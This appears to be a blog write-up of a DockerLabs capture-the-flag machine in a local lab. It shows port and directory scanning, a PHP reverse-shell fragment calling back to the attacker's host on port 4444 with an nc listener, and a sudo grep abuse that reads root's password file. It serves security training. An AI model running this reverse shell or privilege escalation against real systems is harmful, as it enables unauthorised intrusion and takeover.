DOCKERLABS MACHINE
DOCKERLABS
┌──(root㉿kali)-[/home/kali/Descargas]
└─# bash auto_deploy.sh dockerlabs.tar
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
┌──(root㉿kali)-[/home/kali]
└─# ping -c 3 172.17.0.2
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.052 ms
64 bytes from 172.17.0.2: icmp_seq=2 ttl=64 time=0.036 ms
64 bytes from 172.17.0.2: icmp_seq=3 ttl=64 time=0.062 ms
--- 172.17.0.2 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2056ms
rtt min/avg/max/mdev = 0.036/0.050/0.062/0.010 ms
Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed port 80 (HTTP) was opened.
┌──(root㉿kali)-[/home/kali]
└─# nmap -n -Pn -p- --min-rate 5000 172.17.0.2 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-21 08:15 CET
Initiating ARP Ping Scan at 08:15
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 08:15, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 08:15
Scanning 172.17.0.2 [65535 ports]
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 08:15, 1.14s elapsed (65535 total ports)
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000070s latency).
Scanned at 2026-02-21 08:15:57 CET for 1s
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
MAC Address: 02:42:AC:11:00:02 (Unknown)
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.41 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Now, let's go to scanning with gobuster toolkit to get the information in this webpage as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u "http://172.17.0.2/" -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,exe,back,bak,xml,
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.17.0.2/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: exe,back,bak,xml,,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 8235]
/uploads (Status: 301) [Size: 310] [--> http://172.17.0.2/uploads/]
/upload.php (Status: 200) [Size: 0]
/machine.php (Status: 200) [Size: 1361]
/server-status (Status: 403) [Size: 275]
Progress: 1764456 / 1764456 (100.00%)
===============================================================
Finished
===============================================================
Now, let's go to create reverse shell as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# nano reverse.php
set_time_limit (0);
$VERSION = "1.0";
$ip = '172.17.0.1'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
Now, we have to open port 4444 and then we will begin get the reverse shell and access to victim machine as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# nc -lvp 4444
listening on [any] 4444 ...
172.17.0.2: inverse host lookup failed: Unknown host
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 59320
Linux ca7d889e38ae 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64 x86_64 x86_64 GNU/Linux
08:48:24 up 41 min, 0 user, load average: 0.77, 2.68, 3.21
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@ca7d889e38ae:/$ ^Z
zsh: suspended nc -lvp 4444
┌──(root㉿kali)-[/home/kali]
└─# stty raw -echo;fg
www-data@ca7d889e38ae:/$ export TERM=xterm
www-data@ca7d889e38ae:/$ export SHELL=BASH
www-data@ca7d889e38ae:/$ sudo -l
Matching Defaults entries for www-data on ca7d889e38ae:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
We are going to using this link in gtobins which is:
https://gtfobins.org/gtfobins/grep/#file-read
User www-data may run the following commands on ca7d889e38ae:
(root) NOPASSWD: /usr/bin/cut
(root) NOPASSWD: /usr/bin/grep
www-data@ca7d889e38ae:/home$ cd ..
www-data@ca7d889e38ae:/$ ls
bin dev home lib.usr-is-merged media opt root sbin sys usr
boot etc lib lib64 mnt proc run srv tmp var
www-data@ca7d889e38ae:/$ cd /opt/
www-data@ca7d889e38ae:/opt$ ls
nota.txt
www-data@ca7d889e38ae:/opt$ cat nota.txt
Protege la clave de root, se encuentra en su directorio /root/clave.txt, menos mal que nadie tiene permisos para acceder a ella.
www-data@ca7d889e38ae:/opt$
Gotha! we have discovered the password root with the next command sudo -u "root" /usr/bin/grep '' /root/clave.txt which is dockerlabsmolamogollon123 as you can see below.
www-data@ca7d889e38ae:/opt$ sudo -u "root" /usr/bin/grep '' /root/clave.txt
dockerlabsmolamogollon123
www-data@ca7d889e38ae:/opt$ su root
Password:
root@ca7d889e38ae:/opt# whoami
root
Thank you very much for reading this article
Comments
Post a Comment